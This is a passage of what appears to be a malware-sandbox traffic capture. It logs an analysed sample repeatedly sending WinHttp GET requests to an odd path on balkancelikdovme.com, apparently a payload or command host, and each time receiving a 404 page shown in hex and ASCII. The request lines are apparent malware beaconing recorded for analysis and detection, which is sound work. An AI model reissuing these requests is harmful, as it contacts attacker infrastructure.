6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:16:48.403294086 CEST	2273	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:16:48.652740955 CEST	2273	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:16:48.954236984 CEST	2273	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:16:49.239614010 CEST	2274	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:16:49 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:16:58.437895060 CEST	2275	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:16:58.471102953 CEST	2276	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:16:58 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:17:08.417718887 CEST	2276	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:17:08.450614929 CEST	2277	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:17:08 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:17:18.414856911 CEST	2285	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:17:18.450731039 CEST	2286	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:17:18 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:17:28.389785051 CEST	2287	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:17:28.422786951 CEST	2288	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:17:28 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:17:38.405219078 CEST	2295	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:17:38.438024998 CEST	2296	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:17:38 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 23, 2023 20:17:48.433187962 CEST	2296	OUT	GET /hjghgynyvbtvyugjhbugvdveksk/Xezdxpgykmk HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
Aug 23, 2023 20:17:48.466253042 CEST	2297	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 23 Aug 2023 18:17:48 GMT vary: User-Agent Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 